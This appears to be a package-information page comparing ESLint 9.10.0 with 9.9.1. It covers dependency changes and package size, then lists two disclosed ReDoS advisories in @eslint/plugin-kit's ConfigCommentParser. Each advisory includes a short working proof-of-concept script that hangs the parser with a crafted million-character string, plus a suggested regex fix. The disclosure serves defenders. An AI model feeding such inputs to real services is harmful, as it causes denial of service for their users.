ESLint version 9.10.0 introduces several updates compared to its predecessor, version 9.9.1, making it a compelling upgrade for JavaScript developers. One key difference lies in the dependencies; version 9.10.0 includes an updated @eslint/js dependency, bumping it to version 9.10.0 inline with the main package, while 9.9.1 had version 9.9.1. This suggests potential improvements and fixes within the core JavaScript rules of ESLint itself. Furthermore, @eslint/core received an update from 0.4.0 to 0.5.0, and @eslint/json was updated from 0.3.0 to 0.4.0. These upgrades likely involve enhancements to ESLint's core functionality and JSON-specific linting capabilities.
The newer version also reflects a commitment to staying current with supporting libraries, as evidenced by the introduction of @humanwhocodes/module-importer":"^1.0.1" and other dependency updates. Developers should note that while many devDependencies remain the same, the introduction of @eslint-community/regexpp":"^4.11.0", @eslint-community/eslint-utils":"^4.2.0" in dependencies can impact rulesets leveraging regular expressions, potentially leading to more accurate or stricter linting behaviors. Lastly, version 9.10.0 features changes in the distribution, reflected in an increase in fileCount (from 404 to 416) and unpackedSize (from 3,080,094 bytes to 3,288,062 bytes), indicating added features or modifications.
All the vulnerabilities related to the version 9.10.0 of the package
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
Crafting a very large and well crafted string can increase the CPU usage and crash the program.
const { ConfigCommentParser } = require("@eslint/plugin-kit");
var str = "";
for (var i = 0; i < 1000000; i++) {
str += " ";
}
str += "A";
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")
// run `npm i @eslint/plugin-kit` and `node attack.js`
// then the program will stuck forever with high CPU usage
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.